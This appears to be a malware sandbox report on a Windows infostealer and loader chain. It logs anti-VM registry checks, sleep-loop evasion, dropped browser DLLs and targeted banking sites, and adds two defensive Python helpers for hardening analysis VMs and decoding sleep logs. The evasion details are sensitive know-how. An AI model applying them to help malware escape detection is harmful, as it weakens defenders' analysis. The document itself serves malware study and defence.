Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Special instruction interceptor: First address: 674853 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 116E86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: BD0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: BD0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: C54853 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Memory allocated: F80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Memory allocated: 2B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Memory allocated: 1200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
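The three registry reads above (the display adapter's DriverDesc under the display class GUID, then SystemBiosVersion and VideoBiosVersion) are the usual places a sample looks for a hypervisor vendor string. The Python below is an added check for whoever operates the analysis VM, not code from the sandbox or from the sample: it reads exactly those three values on Windows via winreg and scores them against hypervisor markers. The marker list is drawn from strings that appear elsewhere in this report (VMware and the VMW201 BIOS id, VBOX, Hyper-V, vmci) plus qemu, bochs and parallels, which the report does not mention. SANDBOX_LIKE and BARE_METAL_LIKE are constructed fixtures, not values taken from the report (only the VMW201 BIOS id is); all names are this example's own.

```python
r"""Probe the registry values axplong.exe reads in this report for hypervisor strings.

Added example for verifying an analysis VM; not sandbox code and not the sample's
code.  On Windows the values are read with winreg; elsewhere, or in a test, pass a
dict of values to score().  REG_MULTI_SZ values arrive as lists and are joined.
"""
import sys

# Exactly the (key, value) pairs the sample queried, in the report's order.
PROBES = [
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
]

# Lower-case substrings; "vmw" covers both "VMware" and the "VMW201..." BIOS id.
MARKERS = ("vmw", "vbox", "virtualbox", "hyper-v", "vmci", "qemu", "bochs", "parallels")


def read_probes_from_registry():
    """Read PROBES from HKLM (Windows only).  A missing key or value is
    recorded as None instead of raising so the scan always completes."""
    import winreg
    values = {}
    for subkey, name in PROBES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                values[name] = winreg.QueryValueEx(key, name)[0]
        except OSError:
            values[name] = None
    return values


def _as_text(data):
    """Normalise REG_SZ (str), REG_MULTI_SZ (list) and None to one string."""
    if data is None:
        return ""
    if isinstance(data, (list, tuple)):
        return " ".join(str(s) for s in data)
    return str(data)


def score(values):
    """Return (hits, verdict): hits maps each probed value name to the markers
    found in it; verdict is 'vm_exposed' if any value leaks a hypervisor string."""
    hits = {}
    for _subkey, name in PROBES:
        text = _as_text(values.get(name)).lower()
        hits[name] = [m for m in MARKERS if m in text]
    return hits, ("vm_exposed" if any(hits.values()) else "clean")


# Constructed fixture shaped like the sandbox host in this report: the BIOS id
# VMW201.00V.20829224.B64.2211211842 appears in the Amcache strings; the
# adapter and video BIOS strings are placeholders, not report data.
SANDBOX_LIKE = {
    "DriverDesc": "VMware SVGA 3D",
    "SystemBiosVersion": ["VMW201.00V.20829224.B64.2211211842"],
    "VideoBiosVersion": ["VMware SVGA II"],
}
# Constructed fixture for a physical workstation (placeholder strings).
BARE_METAL_LIKE = {
    "DriverDesc": "NVIDIA GeForce RTX 3060",
    "SystemBiosVersion": ["ALASKA - 1072009", "1.40"],
    "VideoBiosVersion": ["Version 94.06.2F.00.5D"],
}

if __name__ == "__main__":
    values = read_probes_from_registry() if sys.platform == "win32" else SANDBOX_LIKE
    hits, verdict = score(values)
    print(verdict)
    for name, found in hits.items():
        print(f"  {name}: {values.get(name)!r} -> {found or 'no marker'}")
```

Run on a stock VMware guest all three values hit on "vmw"; a host whose output is "clean" for these three values still has the WMI Win32_DiskDrive / Win32_VideoController paths and the ACPI DSDT key (HARDWARE\ACPI\DSDT\VBOX__ in the strings below) to worry about, so treat this as one probe among several, not a full hardening audit.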
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Code function: 5_2_04EC0983 rdtsc 5_2_04EC0983
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1125
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1119
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1146
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1131
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1184
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 3508
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 3216
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 428
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Window / User API: threadDelayed 3869
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Window / User API: threadDelayed 4566
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676 Thread sleep count: 1125 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676 Thread sleep time: -2251125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804 Thread sleep count: 1119 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804 Thread sleep time: -2239119s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204 Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204 Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920 Thread sleep count: 282 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920 Thread sleep time: -8460000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096 Thread sleep count: 1146 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096 Thread sleep time: -2293146s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828 Thread sleep count: 1131 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828 Thread sleep time: -2263131s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4304 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448 Thread sleep count: 1184 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448 Thread sleep time: -2369184s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708 Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372 Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240 Thread sleep count: 242 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240 Thread sleep time: -7260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896 Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896 Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888 Thread sleep count: 3508 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888 Thread sleep time: -7019508s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5020 Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072 Thread sleep count: 3216 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072 Thread sleep time: -6435216s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072 Thread sleep count: 260 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072 Thread sleep time: -520260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888 Thread sleep count: 428 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888 Thread sleep time: -856428s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 2748 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 6648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe TID: 8424 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe TID: 8452 Thread sleep time: -48000s >= -30000s
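The sleep lines above are easier to reason about once they are folded per thread: the sandbox prints a count line only when a thread slept more than 30 times, and a total that it renders as a negative number with an "s" suffix against its "-30000s" bar. The Python below is an added reading aid for this report, not Joe Sandbox code and not code from the samples; the embedded lines are copied from the list above. Two assumptions are built in and labelled in the code: the totals are summed relative delays in milliseconds (so "-30000s" is the sandbox's 30-second rule), and a total of 922337203685477 is 0x8000000000000000 divided by 10000, i.e. the NtDelayExecution interval that Sleep(INFINITE) and Thread.Sleep(Timeout.Infinite) pass and that the kernel treats as "wait forever". All names are this example's own.

```python
"""Fold "Thread sleep count" / "Thread sleep time" report lines into a per-thread profile.

Added example for reading this report; not sandbox code and not the samples' code.
Assumptions: the negative "...s" totals are summed relative delays in milliseconds,
and 922337203685477 ms is the INT64_MIN delay interval, i.e. an infinite wait.
A thread with a time line but no count line slept at most 30 times.
"""
import re
from collections import defaultdict

# Copied from the report above (a subset).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676 Thread sleep count: 1125 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676 Thread sleep time: -2251125s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920 Thread sleep count: 282 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920 Thread sleep time: -8460000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4304 Thread sleep time: -180000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888 Thread sleep count: 3508 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888 Thread sleep time: -7019508s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5020 Thread sleep time: -900000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 6648 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe TID: 8424 Thread sleep time: -150000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe TID: 8452 Thread sleep time: -48000s >= -30000s",
]

INFINITE_MS = (1 << 63) // 10_000       # 922337203685477: INT64_MIN in ms (assumption)
SANDBOX_COUNT_BAR = 30                  # the "> 30" in the count lines
SANDBOX_TOTAL_BAR_MS = 30_000           # the "-30000s" in the time lines

COUNT_RE = re.compile(r"Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+)")
TIME_RE = re.compile(r"Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")


def nt_interval(ms):
    """Relative NtDelayExecution interval for Sleep(ms): a negative count of
    100 ns ticks; the infinite sentinel maps back to INT64_MIN."""
    return -(1 << 63) if ms == INFINITE_MS else -ms * 10_000


def profile(lines):
    """{(exe, tid): {...}} with count, total, per-call delay, the decoded NT
    interval and the verdict the sandbox's own thresholds would give."""
    raw = defaultdict(lambda: {"count": 0, "total_ms": 0})
    for line in lines:
        m = COUNT_RE.search(line) or TIME_RE.search(line)
        if not m:
            continue
        key = (m["proc"].rsplit("\\", 1)[-1], int(m["tid"]))
        if "n" in m.groupdict():
            raw[key]["count"] = int(m["n"])
        else:
            raw[key]["total_ms"] = int(m["ms"])
    out = {}
    for key, r in raw.items():
        n, total = r["count"], r["total_ms"]
        infinite = total == INFINITE_MS
        per_call = None if infinite or n == 0 else total // n
        out[key] = {
            "count": n,                    # 0 means no count line: at most 30 calls
            "total_ms": total,
            "infinite": infinite,
            "per_call_ms": per_call,
            "nt_interval": nt_interval(total if per_call is None else per_call),
            "evasive": n > SANDBOX_COUNT_BAR or total >= SANDBOX_TOTAL_BAR_MS,
        }
    return out


def sleep_pattern(prof):
    """Distinct per-call delays per executable: a couple of fixed values repeated
    thousands of times is a sleep loop, not one long Sleep()."""
    pat = defaultdict(set)
    for (exe, _tid), t in prof.items():
        if t["per_call_ms"] is not None:
            pat[exe].add(t["per_call_ms"])
    return {exe: sorted(v) for exe, v in pat.items()}


if __name__ == "__main__":
    prof = profile(SAMPLE_LINES)
    for key, t in sorted(prof.items()):
        print(key, t)
    print(sleep_pattern(prof))
```

Two things fall out of the embedded lines. The explorti.exe and axplong.exe threads divide exactly: 2251125 / 1125 and 7019508 / 3508 are both 2001 ms and 8460000 / 282 is 30000 ms, so these processes loop on short fixed sleeps across several threads rather than issuing one long delay, which is the pattern that defeats sleep-skipping hooks that only shorten large Sleep() arguments. The buildred.exe thread's 922337203685477 decodes to the infinite interval, i.e. a thread parked forever, not a timed delay at all.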
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: KJEHJKJE.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: KJEHJKJE.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KJEHJKJE.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: KJEHJKJE.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareoC
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: KJEHJKJE.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: KJEHJKJE.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KJEHJKJE.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEHJKJE.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KJEHJKJE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KJEHJKJE.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KJEHJKJE.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: KJEHJKJE.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: KJEHJKJE.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: KJEHJKJE.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2269772396.0000000000C51000.00000040.00000001.01000000.00000009.sdmp, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2308351470.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API 